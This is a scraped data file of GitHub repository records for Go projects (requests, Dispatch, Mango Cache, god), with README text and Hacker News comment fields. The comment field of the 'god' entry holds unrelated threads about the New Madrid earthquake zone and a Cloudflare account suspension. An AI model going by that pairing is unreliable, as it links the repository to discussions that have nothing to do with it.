\n\n### POST a JSON object and parse the response\n\n```go\nvar res placeholder\nreq := placeholder{\n\tTitle: \"foo\",\n\tBody: \"baz\",\n\tUserID: 1,\n}\nerr := requests.\n\tURL(\"/posts\").\n\tHost(\"jsonplaceholder.typicode.com\").\n\tBodyJSON(&req).\n\tToJSON(&res).\n\tFetch(ctx)\n// net/http equivalent left as an exercise for the reader\n```\n\n### Set custom headers for a request\n\n```go\n// Set headers\nvar headers postman\nerr := requests.\n\tURL(\"https://postman-echo.com/get\").\n\tUserAgent(\"bond/james-bond\").\n\tContentType(\"secret\").\n\tHeader(\"martini\", \"shaken\").\n\tFetch(ctx)\n```\n\n### Easily manipulate query parameters\n\n```go\nvar params postman\nerr := requests.\n\tURL(\"https://postman-echo.com/get?a=1&b=2\").\n\tParam(\"b\", \"3\").\n\tParam(\"c\", \"4\").\n\tFetch(ctx)\n\t// URL is https://postman-echo.com/get?a=1&b=3&c=4\n```\n\n### Record and replay responses\n\n```go\n// record a request to the file system\nvar s1, s2 string\nerr := requests.URL(\"http://example.com\").\n\tTransport(requests.Record(nil, \"somedir\")).\n\tToString(&s1).\n\tFetch(ctx)\ncheck(err)\n\n// now replay the request in tests\nerr = requests.URL(\"http://example.com\").\n\tTransport(requests.Replay(\"somedir\")).\n\tToString(&s2).\n\tFetch(ctx)\ncheck(err)\nassert(s1 == s2) // true\n```\n\n## FAQs\n\n[See wiki](https://github.com/carlmjohnson/requests/wiki) for more details.\n\n### Why not just use the standard library HTTP client?\n\nBrad Fitzpatrick, long time maintainer of the net/http package, [wrote an extensive list of problems with the standard library HTTP client](https://github.com/bradfitz/exp-httpclient/blob/master/problems.md). His four main points (ignoring issues that can't be resolved by a wrapper around the standard library) are:\n\n> - Too easy to not call Response.Body.Close.\n> - Too easy to not check return status codes\n> - Context support is oddly bolted on\n> - Proper usage is too many lines of boilerplate\n\nRequests solves these issues by always closing the response body, checking status codes by default, always requiring a `context.Context`, and simplifying the boilerplate with a descriptive UI based on fluent method chaining.\n\n### Why requests and not some other helper library?\n\nThere are two major flaws in other libraries as I see it. One is that in other libraries support for `context.Context` tends to be bolted on if it exists at all. Two, many hide the underlying `http.Client` in such a way that it is difficult or impossible to replace or mock out. Beyond that, I believe that none have acheived the same core simplicity that the requests library has.\n\n### How do I just get some JSON?\n\n```go\nvar data SomeDataType\nerr := requests.\n\tURL(\"https://example.com/my-json\").\n\tToJSON(&data).\n\tFetch(ctx)\n```\n\n### How do I post JSON and read the response JSON?\n\n```go\nbody := MyRequestType{}\nvar resp MyResponseType\nerr := requests.\n\tURL(\"https://example.com/my-json\").\n\tBodyJSON(&body).\n\tToJSON(&resp).\n\tFetch(ctx)\n```\n\n### How do I just save a file to disk?\n\nIt depends on exactly what you need in terms of file atomicity and buffering, but this will work for most cases:\n\n```go\n\terr := requests.\n\t\tURL(\"http://example.com\").\n\t\tToFile(\"myfile.txt\").\n\t\tFetch(ctx)\n```\n\nFor more advanced use case, use `ToWriter`.\n\n### How do I save a response to a string?\n\n```go\nvar s string\nerr := requests.\n\tURL(\"http://example.com\").\n\tToString(&s).\n\tFetch(ctx)\n```\n\n### How do I validate the response status?\n\nBy default, if no other validators are added to a builder, requests will check that the response is in the 2XX range. If you add another validator, you can add `builder.CheckStatus(200)` or `builder.AddValidator(requests.DefaultValidator)` to the validation stack.\n\nTo disable all response validation, run `builder.AddValidator(nil)`.\n\n## Contributing\n\nPlease [create a discussion](https://github.com/carlmjohnson/requests/discussions) before submitting a pull request for a new feature.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vmware-archive/dispatch", "link": "https://github.com/vmware-archive/dispatch", "tags": ["dispatch", "faas", "serverless", "kubernetes", "functions"], "stars": 533, "description": "Dispatch is a framework for deploying and managing serverless style applications.", "lang": "Go", "repo_lang": "", "readme": "> **IMPORTANT:** VMware has ended active development of this project, this repository will no longer be updated.\n\n![Dispatch](docs/assets/images/logo-large.png \"Dispatch Logo\")\n\n> **NOTE:** This is the knative branch of Dispatch. Full Dispatch functionality is still a ways off. The code here\n> represents a work in progress. For information about Dispatch Solo, the version of Dispatch distributed as an OVA,\n> see [the `solo` branch](https://github.com/vmware/dispatch/tree/solo) or [documentation](https://vmware.github.io/dispatch/documentation/front/overview).\n\nDispatch is a framework for deploying and managing serverless style applications. The intent is a framework\nwhich enables developers to build applications which are defined by functions which handle business logic and services\nwhich provide all other functionality:\n\n* State (Databases)\n* Messaging/Eventing (Queues)\n* Ingress (Api-Gateways)\n* Etc.\n\nOur goal is to provide a substrate which can be built upon and extended to serve as a framework for serverless\napplications. Additionally, the framework must provide tools and features which aid the developer in building,\ndebugging and maintaining their serverless application.\n\n## Documentation\n\nCheckout the detailed [documentation](https://vmware.github.io/dispatch) including a [quickstart guide](https://vmware.github.io/dispatch/documentation/front/quickstart).\n\n## Architecture\n\n> **NOTE**: The information in this section is specific to the knative branch of Dispatch. Equivalent documentation for Dispatch Solo can be found on [the `solo` branch](https://github.com/vmware/dispatch/tree/solo#architecture).\n\nThe diagram below illustrates the different components which make up the Dispatch project:\n\n![initial dispatch architecture diagram](docs/_specs/dispatch-v2-architecture.png \"Initial Architecture\")\n\n## Installation\n\n> **NOTE**: The information in this section is specific to the knative branch of Dispatch. Equivalent documentation for Dispatch Solo can be found on [the `solo` branch](https://github.com/vmware/dispatch/tree/solo#installation).\n\n### Prerequisites\n\n#### GKE\n\n1. [Create service account key](https://cloud.google.com/iam/docs/creating-managing-service-account-keys#iam-service-account-keys-create-console)\n ```bash\n export GCLOUD_KEY=\n ```\n\n2. Create GKE cluster:\n ```bash\n K8S_VERSION=1.10.7-gke.6\n export CLUSTER_NAME=dispatch-knative\n gcloud container clusters create -m n1-standard-4 --cluster-version ${K8S_VERSION} ${CLUSTER_NAME}\n gcloud container clusters get-credentials ${CLUSTER_NAME}\n ```\n\n3. Install Knative:\n ```bash\n # Get the current knative verision used with dispatch\n KNATIVE_VERSION=$(cat Gopkg.toml | grep -A 2 'name = \"github.com/knative/serving\"' | grep revision | cut -d '\"' -f2)\n ./scripts/install-knative.py ${CLUSTER_NAME} --gcloud-key=${GCLOUD_KEY} --revision=${KNATIVE_VERSION}\n ```\n\n#### VMware Cloud PKS\n\n1. Create a Cloud PKS cluster **with privileged mode enabled**.\n ```bash\n export VKE_CLUSTER=dispatch-knative\n vke cluster create --privilegedMode --name $VKE_CLUSTER --cluster-type PRODUCTION --region us-west-2\n ```\n\n2. Get kubectl credentials:\n ```bash\n vke cluster auth setup $VKE_CLUSTER\n ```\n\n3. Install Knative:\n 1. Install Istio:\n ```bash\n kubectl apply -f third-party/vmware-cloud-pks/istio-1.0.2/istio.yaml\n ```\n 2. Wait for Istio pods to become READY (will take a little while to scale up smart cluster):\n ```bash\n kubectl get pods -n istio-system\n NAME READY STATUS RESTARTS AGE\n istio-citadel-746c765786-2cm5p 1/1 Running 0 6m\n istio-cleanup-secrets-vbqk7 0/1 Completed 0 6m\n istio-egressgateway-57df84cfcf-hpkx4 1/1 Running 0 6m\n istio-galley-5b4f774c-9gcqm 1/1 Running 0 6m\n istio-ingressgateway-76dbd65c-7qf2w 1/1 Running 0 6m\n istio-pilot-7ddfbdf465-cj5jl 2/2 Running 0 6m\n istio-policy-56789fbb8c-flxkz 2/2 Running 0 6m\n istio-statsd-prom-bridge-7c77ddc9b9-s2zwl 1/1 Running 0 6m\n istio-telemetry-855bb88878-kbhsj\n ```\n 3. Install Knative serving (includes build):\n ```bash\n kubectl apply -f third-party/vmware-cloud-pks/serving-0.2.2/release.yaml\n ```\n\n#### Other\n\nIn order to install Knative, follow the [development instructions](https://github.com/knative/serving/blob/master/DEVELOPMENT.md)\n\n## Dispatch\n\nInstalling Dispatch depends on having a Kubernetes cluster with the Knative components installed (Build, Serving and soon Eventing). From here build and install dispatch as follows:\n\n1. Set the following environment variables:\n ```bash\n export DISPATCH_NAMESPACE=\"default\"\n export DISPATCH_DEBUG=\"true\"\n export RELEASE_NAME=\"dispatch\"\n export MINIO_USERNAME=\"dispatch\"\n export MINIO_PASSWORD=\"dispatch\"\n export INGRESS_IP=$(kubectl get service -n istio-system knative-ingressgateway -o wide | tail -n1 | awk '{print $4}')\n ```\n\n2. Build and publish a dispatch image (**Substitute in your docker repository**):\n >Note: if you just want to use a pre-created image use the script to create your `values.yaml` and continue to step 4.\n >```bash\n >TAG=\"v0.1.22-knative\" ./scripts/values.sh\n >```\n\n ```bash\n DISPATCH_SERVER_DOCKER_REPOSITORY= PUSH_IMAGES=1 make images\n ```\n\n3. The previous command will output a configuration file `values.yaml`:\n ```yaml\n image:\n host: username\n tag: v0.1.xx\n registry:\n url: http://dispatch-docker-registry:5000/\n repository: dispatch-docker-registry:5000\n storage:\n minio:\n address: dispatch-minio:9000\n username: ********\n password: ********\n ```\n\n4. Deploy via helm chart (if helm is not installed and initialized, do that first):\n ```bash\n helm init --wait\n # helm won't overwrite the existing config-maps (at least not the first/install time), so explicitly delete them.\n kubectl delete configmap -n knative-serving config-domain config-network\n helm dependency build ./charts/dispatch/\n helm upgrade -i --debug ${RELEASE_NAME} ./charts/dispatch --namespace ${DISPATCH_NAMESPACE} -f values.yaml\n ```\n > **NOTE**: Use following to create cluster role binding for tiller:\n >```bash\n >kubectl create clusterrolebinding tiller-cluster-admin --clusterrole=cluster-admin --serviceaccount=kube-system:default\n >```\n\n5. Reconfigure Knative serving (need to whitelist our internal repository):\n ```bash\n ./scripts/configure-knative.sh\n ```\n\n6. Build the CLI (substitute darwin for linux if needed):\n ```bash\n make cli-darwin\n # Create symlink to binary\n ln -s `pwd`/bin/dispatch-darwin /usr/local/bin/dispatch\n ```\n\n7. Create the Dispatch config:\n ```bash\n cat << EOF > config.json\n {\n \"current\": \"${RELEASE_NAME}\",\n \"contexts\": {\n \"${RELEASE_NAME}\": {\n \"host\": \"$(kubectl -n ${DISPATCH_NAMESPACE} get service ${RELEASE_NAME}-nginx-ingress-controller -o wide | tail -n1 | awk '{print $4}')\",\n \"port\": 443,\n \"scheme\": \"https\",\n \"insecure\": true\n }\n }\n }\n EOF\n # point to the config file (could also move to ~/.dispatch/config)\n export DISPATCH_CONFIG=`pwd`/config.json\n ```\n\n8. Test out your install:\n First, create an baseimage:\n ```bash\n dispatch create base-image python3-base dispatchframework/python3-base:0.0.13-knative\n Created baseimage: python3-base\n ```\n Then, create an image:\n ```bash\n dispatch create image python3 python3-base\n Created image: python3\n ```\n Wait for status READY:\n ```bash\n dispatch get images\n NAME | DESTINATION | BASEIMAGE | STATUS | CREATED DATE\n --------------------------------------------------------------------------\n python3 | *********** | ********* | READY | Tue Sep 25 16:51:35 PDT 2018\n ```\n Create a function:\n ```bash\n dispatch create function --image python3 hello ./examples/python3/hello.py\n Created function: hello\n ```\n Once status is READY:\n ```bash\n dispatch get function\n NAME | FUNCTIONIMAGE | STATUS | CREATED DATE\n ----------------------------------------------------------------\n hello | ************* | READY | Thu Sep 13 12:41:07 PDT 2018\n ```\n Exec the function:\n ```bash\n dispatch exec hello <<< '{\"name\": \"user\"}' | jq .\n {\n \"context\": {\n \"logs\": {\n \"stdout\": [\n \"messages to stdout show up in logs\"\n ],\n \"stderr\": null\n }\n },\n \"payload\": {\n \"myField\": \"Hello, user from Nowhere\"\n }\n }\n ```\n Create an endpoint:\n ```bash\n dispatch create endpoint get-hello hello --method GET --method POST --path /hello\n ```\n Hit the endpoint with curl:\n ```bash\n curl -v http://${INGRESS_IP}/hello?name=Jon -H 'Host: default.${DISPATCH_NAMESPACE}.dispatch.local'\n ```\n\nFor a more complete quickstart see the [developer documentation](#documentation)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "goburrow/cache", "link": "https://github.com/goburrow/cache", "tags": ["cache", "lru", "slru", "tinylfu", "golang"], "stars": 532, "description": "Mango Cache \ud83e\udd6d - Partial implementation of Guava Cache in Go (golang).", "lang": "Go", "repo_lang": "", "readme": "# Mango Cache\n[![GoDoc](https://godoc.org/github.com/goburrow/cache?status.svg)](https://godoc.org/github.com/goburrow/cache)\n![Go](https://github.com/goburrow/cache/workflows/Go/badge.svg)\n\nPartial implementations of [Guava Cache](https://github.com/google/guava) in Go.\n\nSupported cache replacement policies:\n\n- LRU\n- Segmented LRU (default)\n- TinyLFU (experimental)\n\nThe TinyLFU implementation is inspired by\n[Caffeine](https://github.com/ben-manes/caffeine) by Ben Manes and\n[go-tinylfu](https://github.com/dgryski/go-tinylfu) by Damian Gryski.\n\n## Download\n\n```\ngo get -u github.com/goburrow/cache\n```\n\n## Example\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"math/rand\"\n\t\"time\"\n\n\t\"github.com/goburrow/cache\"\n)\n\nfunc main() {\n\tload := func(k cache.Key) (cache.Value, error) {\n\t\ttime.Sleep(100 * time.Millisecond) // Slow task\n\t\treturn fmt.Sprintf(\"%d\", k), nil\n\t}\n\t// Create a loading cache\n\tc := cache.NewLoadingCache(load,\n\t\tcache.WithMaximumSize(100), // Limit number of entries in the cache.\n\t\tcache.WithExpireAfterAccess(1*time.Minute), // Expire entries after 1 minute since last accessed.\n\t\tcache.WithRefreshAfterWrite(2*time.Minute), // Expire entries after 2 minutes since last created.\n\t)\n\n\tgetTicker := time.Tick(100 * time.Millisecond)\n\treportTicker := time.Tick(5 * time.Second)\n\tfor {\n\t\tselect {\n\t\tcase <-getTicker:\n\t\t\t_, _ = c.Get(rand.Intn(200))\n\t\tcase <-reportTicker:\n\t\t\tst := cache.Stats{}\n\t\t\tc.Stats(&st)\n\t\t\tfmt.Printf(\"%+v\\n\", st)\n\t\t}\n\t}\n}\n```\n\n## Performance\n\nSee [traces](traces/) and [benchmark](https://github.com/goburrow/cache/wiki/Benchmark)\n\n![report](traces/report.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zond/god", "link": "https://github.com/zond/god", "tags": [], "stars": 532, "description": "A Go database", "lang": "Go", "repo_lang": "", "readme": "god\n===\n\ngod is a scalable, performant, persistent, in-memory data structure system. It allows massively distributed applications to update and fetch common data in a structured and sorted format.\n\nIts main inspirations are Redis and Chord/DHash. Like Redis it focuses on performance, ease of use, and a small, simple yet powerful feature set, while from the Chord/DHash projects it inherits scalability, redundancy, and transparent failover behaviour.\n\n# Try it out\n\nInstall Go, git, Mercurial and gcc, go get github.com/zond/god/god_server, run god_server, browse to http://localhost:9192/.\n\n# Embed it in your Go application\n\n```\nimport \"github.com/zond/god/dhash\"\ns := dhash.NewNodeDir(fmt.Sprintf(\"%v:%v\", listenIp, listenPort), fmt.Sprintf(\"%v:%v\", broadcastIp, broadcastPort), dataDir)\ns.MustStart()\ns.MustJoin(fmt.Sprintf(\"%v:%v\", joinIp, joinPort))\n```\n\n# Documents\n\nHTML documentation: http://zond.github.com/god/\n\ngodoc documentation: http://godoc.org/github.com/zond/god\n\n# TODO\n\n* Docs\n * Add illustrations to the usage manual\n* Benchmark\n * Consecutively start 1-20 instances on equally powerful machines and benchmark against each size\n * Need 20 machines of equal and constant performance. Is anyone willing to lend me this for few days of benchmarking?\n * Add benchmark results to docs\n", "readme_type": "markdown", "hn_comments": "I'm just across the border from Chicago in Indiana.... and if New Madrid goes off, there is a small but non-zero chance my house will fall off its piers. (We have no basement/foundation) Mitigating this risk is something I can't begin to afford.As someone with extended family living in SE Missouri, I can say this is VERY well known to them. I've seen a coffee table book one of them had with black/white pictures of some of the destruction from the quake there that spawned Reelfoot Lake, and it was enough to give one pause.All my daydreams are disasters.When I was a freshman at Missouri-Rolla (now Missouri S&T) this guy, Iben Browning, predicted that there would be a major earthquake on the New Madrid fault line in December. I think a few schools even closed for the day in the area because some parents were so freaked out about it. It was just the craziest scene that people believed that this nut job could actually predict an earthquake.I wrote a thing about touring this place with geologists a few years back: https://idlewords.com/2015/07/confronting_new_madrid.htmI grew up around here. In 1990 a scientist (Dr. Browning) predicted there would be a major earthquake on a certain day and most parents kept their kids home from school. My dad, a geophysicist, said the guy was a quack so I had to goto school. It was practically empty that day.Pronounced MAD-rid.I live in Madrid, Spain, a zone not prone to any earthquakes and the title startled me quite a bit.The last memorable earthquake in the Midwest was the 5.2 \"tremor\" of 2008 [0] just north of the New Madrid fault. It was felt as far away as Georgia and Nebraska. I recall a scientist quoted as saying that the area \"rung like a bell\" because it occurred in the stable interior craton. It caused some minor damage like a few bricks falling off a couple buildings. I was working in a 2nd story building and felt the the upper cabinet of my office vibrate a little.[0] https://en.m.wikipedia.org/wiki/2008_Illinois_earthquakeMy experience with the Cloudflare sales team is they were woefully disconnected from any ability to make good on their promises, and that it didn\u2019t matter to them at all. It was a strange narcissism -bit wasn\u2019t that they were deliberately lying, it was as if the notion of truth and lies didn\u2019t matter. That if they kept blabbering assumed that they\u2019d get the sale.In general you can\u2019t trust salespeople and need to get everything in writing. Cloudflare is a prime example of why.And I\u2019d add in my case because we were keeping track of their promises, we caught them before the sales process completed. It cost them seven figures a year. But maybe it doesn\u2019t matter - their sales approach still has them worth $20 billion.Maybe they booted you because your business model is to use Cloudflare to repeatedly and aggressively scrape data from cryptocurrency exchanges and then resell it for hundreds of dollars a month.Sounds like an abuse of their terms of service to me.From an earlier comment I made regarding Stripe shutting merchants down, and those merchants resorting to posting on HN and getting someone on HN to advocate for them to resolve their problem [0]:\"The main issue is not that [COMPANY] is working hard to protect itself and its customers, but that customers feel very powerless in these situations. When it takes a massive effort to get attention, especially if you're small and powerless, you feel that you have no control, and that your issues will go unanswered. What can the average, powerless customer who doesn't have the weight of social media, HN, @dang, or others on their side do when their hard-earned money or business is being held, locked, or otherwise prevented, and when the cause is not fraudulent, or if the customer is unaware of that activity? The problem is that accounts are just shut down, moneys are held, and there's no quick or clear communication, with customer support simply saying it's not in their control. It's this feeling of powerlessness that's the issue, regardless of whether or not [COMPANY] is in its rights or doing what it feels is in its and its customers best interests.What can you do to help empower the powerless customers when their livelihoods are at stake? Can you provide some way to not instantly assume fraud or malicious intent on behalf of the customer and provide some quick and direct way for the customer to feel empowered?\"Having to resort to HN to get major problems resolved that are major customer service and potential legal / liability issues causes me a lot of stress when I realize that I have don't have nearly the same sort of power or influence as some of the others here do on HN. I worry that my complaints would simply go ignored.@jgrahamc would love you to comment on what we can do to avoid people having to resort to HN for a solution to these problems, which favors the well-connected and squeaky wheels and disfavors everyone else.[0] https://news.ycombinator.com/item?id=34274456Also want to be kept updated on this issue since it touches some clients of mineLiterally just sent an email to my devops guys to move off cloudflare asap. This cavalier lack of respect is a diservice and insult to all the people who rely on my product for their livelihood.I've been interested in using Cloudflare Workers as the backend for an application. I don't care about caching or anything like that, but, can I serve exclusively non-html content from my Cloudflare Workers? Or is that a violation of their ToS?I would have never honestly considered serving _html_ from a Worker. I hope we can get an extremely clear statement from Cloudflare on what their policy is.Sales said something would never happen...Word of warning: don't use cloudflareOr really any service that has it written that they can end your business without notice~> ...anyways I get it, perhaps I pay too little and should be on enterprise plan alreadyIf you're on Workers Unbound, you're probably paying closer to ~$800/mo for 4b requests; or if you're on Workers Bundled, then ~2000/mo. What were you quoted for the Enterprise plan? I thought those start at $1500/mo?Glad to hear this got resolved. Heads-up that your name may be infringing on a US trademark held by the BBC.Cloudflare has published a blog post about this event: https://blog.cloudflare.com/how-cloudflare-erroneously-throt...Was your account disabled including the DNS?Sad it happened. This highlights why it is important to reduce your exposure to external services. Right now I just deploy on bare metals servers and are ready to move them if need to. As they say, there's no cloud - just someone's else' computerCloudflare has gotten incredibly bad lately. If you don't want to offer your services to someone that's fine but you should at least do the bare minimum and reach out before completely terminating a vital piece of infrastructure they rely on.Oh, it looks like Cloudflare is no longer a good choice. We had very similar experience with Ionic. We tried to put our money in, but no one was interested.I've recently dropped and then readded (a few months later) a zone to Cloudflare for a domain only I ever owned. And they refused to add it for \"policy\" reasons, so I had to wait a week or so until Cloudflare just unlocked it without providing any rationale.It's not a company I trust to not randomly screw me over out of the blue anymore.I went to look at your website to see what the service was about\u2026 but of course it\u2019s down :(good to know. will make sure to never give cloudflare a dime.Cloudflare pricing is crazy rabbit hole. What are the triggers the need to migrate to Cloudflare enterprise? moreover is possible to just be pay-per use?OP, you have garnered a lot of sympathy by the HN community which I believe in part contributed to your problem being resolved. I think it would be fair to provide more info about what the issue was in the end. It's not OK to be like \"HN I had a bad experience with Company X\" and then be like \"k, thx @jgrahamc, bye\" when your complaint gets resolved due to the attention it received.There are so many questions this leaves unanswered:- Was this a one-off error in Cloudflare's processes? (These things happen on a big enough scale.)- Were you violating a specific clause of Cloudflare's T&C? How clear was the clause? What did you do to fix this?- Was the issue that Cloudflare estimated that you're not paying enough given the bandwidth you're consuming? Did you end up signing up for the Enterprise plan?Transparency would benefit both Cloudflare (in not making people unnecessarily apprehensive about becoming/remaining a customer) and you (in demonstrating that you're handling this issue in a professional and responsible manner).If anyone interested here\u2019s what happened https://news.ycombinator.com/item?id=34696763 \nI was not aware about the spike in bandwidth, will also try to handle such cases on my side better.Wow very interesting product, what\u2019s your GTM strategyCloudflare: MitMaaShttps://framagit.org/dCF/deCloudflare/-/blob/master/readme/e...I see accounts like this all the time, I run into the endless loop of cloudflare refusing to serve me a webpage all the time. Somehow clicking the captcha seems to do nothing. I don't know if it's my insistence on using my browser of choice, or my regular clearing of cookies or what have you while trying to keep my laptop secure.All I know is to me Cloudflare seems to be a gatekeeper of the worst kind, the kind that blocks me from accessing the content I seek to load.And the idea that it somehow is protecting the web seems more and more ludicrous each tale like this I read. With each page that is delayed in a loop before finally letting me read it, I become more and more convinced at the sheer uselessness of it. Why does anyone bother with it in the first place when it clearly doesn't actually work and worse can be turned against you at any time?Can someone explain to me why anyone would pay for this SaaS, and instead just use an api from all markets?This is very worrying.I use Workers to cache and stream audio. I was under the impression Workers were under a different TOS since the business model is totally different and paid per req.I've asked internally to understand this.While I agree HN shouldn't be used as a way to get direct customer support, I don't think it's fair to grab and point our pitchforks to @jgrahamc over a one sided story. There's not nearly enough information from both sides to create fair judgement (these things happen, unfortunately, at larger scale with automated processes). What matters is the afterthought and actions taken of what's going to prevent a similar situation in the future (which I'd love to read from both OP and @jgrahamc if possible). HN is my go to stop for well formulated opinions written by people way smarter than me and I think we dropped the ball here, HN can do better. That said, happy that your issue got resolved OP and goodluck with your project!Oh my, 2.8 is \"great\".\nTime to reread the service terms.\nAnd it is in the times of API-s (and 20 years since ajax). Otherwise, this means that we can use workers for some stuff but need to use another provider for other stuff. Complexity overload, would rather use one provider, unless there are some great savings to move stuff to workers (that could cover the development complexity).4 Billion requests per month involving 1 Petabyte of traffic doesn't seem like a \"small SAAS\", at least packet-wise. If its small revenue-wise, addressing that is a business concern as important as having your platform throttled for using the cheapo economy edition tier of whatever you've signed up for with Cloudflare. Did Cloudflare issue any formal communication with you warning about usage and how it violates contractual terms, or did they \"ban\" you out of nowhere?The comments here have mainly focused on the issue of instant suspension - which is obviously deeply concerning - but I also feel like there is a huge issue at Cloudflare regarding their Enterprise pricing model.Cloudflare's sales team and Enterprise pricing model are one of the least effective sales organisations I have encountered in this space. Given the technical nature of their product, it's extremely hard to explain even basic uses of the tool and things like Workers are near impossible to discuss with them. I was really unsurprised to see that OP had a failed Enterprise negotiation with them as I have had the exact same conversation at three different companies now and can imagine perfectly what you were told.The current offerings of Enterprise and Enterprise Lite simply do not map to the reality of how people use the tool and scale businesses on top of it. I think in part due to Cloudflare's history essentially selling bandwidth and caching, the model is fixated on high binary traffic workloads and simply cannot comprehend the SaaS service model that runs on it and tools like Workers.This is mostly a rant and hopefully a small +1 signal that this area needs major improvement - but I would also love to hear if anyone else has had interactions with Cloudflare Enterprise and how they found that process?(Disclaimer: I'm a massive fan of Cloudflare, a user of their products and hold their stock)\"The large print giveth, the small print taketh away\" has never been more true than with Cloudflare.None of Cloudflare's marketing or technical documentation makes any explicit reference to \"permitted usages\" for Cloudflare services such as R2 and Workers.This page for example means one thing without any reference to permitted usages and would mean something entirely different if the permitted usages were promoted with the same level of visibility as the benefits.https://www.cloudflare.com/products/r2/Nothing here tells me I cannot write my own video serving code with Workers:https://workers.cloudflare.com/You might even believe \"whatever you need\" from this paragraph from the above link:\"Static assets with dynamic power. Say goodbye to build steps which pre-generate thousands of assets in advance. Harness the unrivaled raw power of the edge to generate images, SVGs, PDFs, whatever you need, on the fly, and deliver them to users as quickly as a static asset.\"This developer documentation would takes on an entirely new meaning if a link to \"acceptable uses\" was prominent at the top of each page (not fine print).https://developers.cloudflare.com/r2/get-started/https://developers.cloudflare.com/r2/data-access/workers-api...https://developers.cloudflare.com/r2/examples/demo-worker/Have built an entire application around assuming there were no such limitations I now need to rebuild elsewhere.Humph.I now no longer even understand what \"no egress fees\" means - in a way that's worse than the big cloud providers where at least you know they are charging you 9 cents per gigabyte.Very similar to this other one https://news.ycombinator.com/item?id=34235237I just repost the same comment I put in the above thread> The thing that scary me most is that his business get shut down without any notice period (at least the author not mentioning any previous communications from Cloudflare team about the issue).> This is really a shitty thing from Cloudflare, you cannot shut down an already running business without any notice/grace period.Are there no laws around account removal/shutdown? In the future I will be actively asking service providers their procedures on account shutdown.What even is the restriction on returning JSON? One of the examples is explicitly how to return JSONhttps://developers.cloudflare.com/workers/examples/return-js...From the terms> 2.8 Limitation on Serving Non-HTML Content> The Services are offered primarily as a platform to cache and serve web pages and websites. Unless explicitly included as part of a Paid Service purchased by you, you agree to use the Services solely for the purpose of (i) serving web pages as viewed through a web browser or other functionally equivalent applications, including rendering Hypertext Markup Language (HTML) *or other functional equivalents, and (ii) serving web APIs subject to the restrictions set forth in this Section 2.8*. Use of the Services for serving video or a disproportionate percentage of pictures, audio files, or other non-HTML content is prohibited, unless purchased separately as part of a Paid Service *or expressly allowed under our Supplemental Terms for a specific Service*. If we determine you have breached this Section 2.8, we may immediately suspend or restrict your use of the Services, or limit End User access to certain of your resources through the Services.Supplemental terms> The Cloudflare Developer Platform consists of the following Services: (i) *Cloudflare Workers*, a Service that permits developers to deploy and run encapsulated versions of their proprietary software source code (each a \u201cWorkers Script\u201d) on Cloudflare\u2019s edge servers; (ii) Cloudflare Pages, a JAMstack platform for frontend developers to collaborate and deploy websites; (iii) Cloudflare Queues, a managed message queuing service; and (iv) Workers KV, Durable Objects, and R2, storage offerings *used to serve HTML and non-HTML content.*I can't quite figure out how to parse this such that workers would be deemed unusable to just run an API.I'd absolutely have gone ahead with using it for an API.Just imagine how many people that this happens to who don't know enough to post online on a forum that lots of people read.For the CloudFlare people here, this is an upsell opportunity that's being missed. The whole point of the cheap plan is to hook people so they move up. But if you cut them off you can't move them up, duh. You need to rework the sales pipeline for this scenario, obviously.[flagged]I stopped paying for cloudflare after their support team was unable to debug why one of my rewrite conditions wasn't working. I provided them full details like for kindergarden, but they replied after days saying it's working on their end, lol. I deeply respect the cloudflare tech and the dev team, but support sucks and i don't trust cloudflare anymore. I won't pay even a single cent, even if they would have stellar support from now on. After reading all these cloudflare stories lately, and knowing how they treated me, i don't care about them anymore. Someone should write a \"you probably dont need cloudflare\" article. I'm disgusted by these kind of companies that grow large and they stop caring for the people who were there with them from day 1.[flagged]> when I got approached by Cloudflare sales team I explicitly asked if I can still be on pay as you go/self server model and reply was:Never entirely trust what is said to you to secure/continue a sale, unless you have it written in a contract.> \u2026 \"Enterprise wise, that's up to you and you could likely get away with utilising self-serve as you go\u2026 especially if what sales say to you is couched in vague works like \u201clikely to get away with\u201d.i feel like this is a repeating theme, and i've seen it at a company i was at.in my view, the root of the problem is that companies don't have usage limits in place.they often have 'sort of' usage limits in place -- that is, they don't actually have metrics for their customers' usage, and that leads to these situations.and these situations are insane resource hogs -- teams of people spending days to try to figure out whether some customer should be bumped up to the next level.it doesn't happen, then the customer gets cut off.pretty messed up for Cloudflare to try and destroy a company like that for no reason.we get these wishy-washy usage/support/sales situations with a lot of ambigous back and forth, and BIGCOMPANY trying to kill _littlecompany_, etc.set usage limits, when they're surpassed, move the customer to the higher tier, done.plenty more you can do around the edges, like grace periods, etc. etc., but i feel like this is amateur hour and cruel indifference - in this case, from Cloudflare -- and not the first time we've seen indifference from them, and other BIGTECH companies.[flagged]Cloudflare support is complete garbage.We upgraded to Enterprise, and had some issues because CF's documentation was not clear (literally a blog post), and their support took many days to even respond and then their response made it clear they hadn't even read the ticket.I'd move everything into AWS in a second if moving DNS wasn't such a pain.Also am forced to use the global api token because constantly get rate limited using permission-scoped api tokens -- this is from a simple Terraform plan (first thing in the morning) and after them increasing my rate limit to the max.I'm very interested in this. I also have clients with very large usage volumes on CFCloudflare has non-transparent pricing, unlike AWS, which will charge you for every thing with detailed usage tracking.When ever there is non-transparent pricing, it's scary to try and use an infrastructure related service.The sales teams can't go around saying that you are not a profitable customer, and they can't argue with the marketing team to be more honest about pricing on the pricing page.So, end result, let's bump of these small free loaders. Large enterprise deals is what gets us the bonus anyways.I like fly.io pricing in that sense. And I am sure there might be others offering a more transparent pricing, otherwise like me still stuck on AWS.Welcome to Google I mean Twitter I mean Facebook I mean cloudflare support.I really curious about how this unfolds, I was planning to migrate from AWS Lambda to Cloudflare Workers. And we have LOTs of Json, and APIs. Why would they cancel paying Workers customers?Since \"there is no such thing as bad publicity\":- Is that a good way to get cheap \"influencers\"?- Are there companies helping you measuring the potential \"outreach\" of your customers in case you piss them off?OP, any updates?i'm about to move a significant amount of traffic to cloudflare. holding off until i see how this is handled. Can you please update this to reflect the total time of service outage and time to resolve. As a busy tech company, this is an unneeded problem. We pay cloudflare to be fast. Not make our sites slow and unresponsive.How are you using the workers? Is the JSON cached? Where do you get the JSON?Around 12:00 UTC today ban has been lifted for my account thanks to @jgrahamc - thanks!> Small SaaS\n> 4 billions requests & 1PB of data per 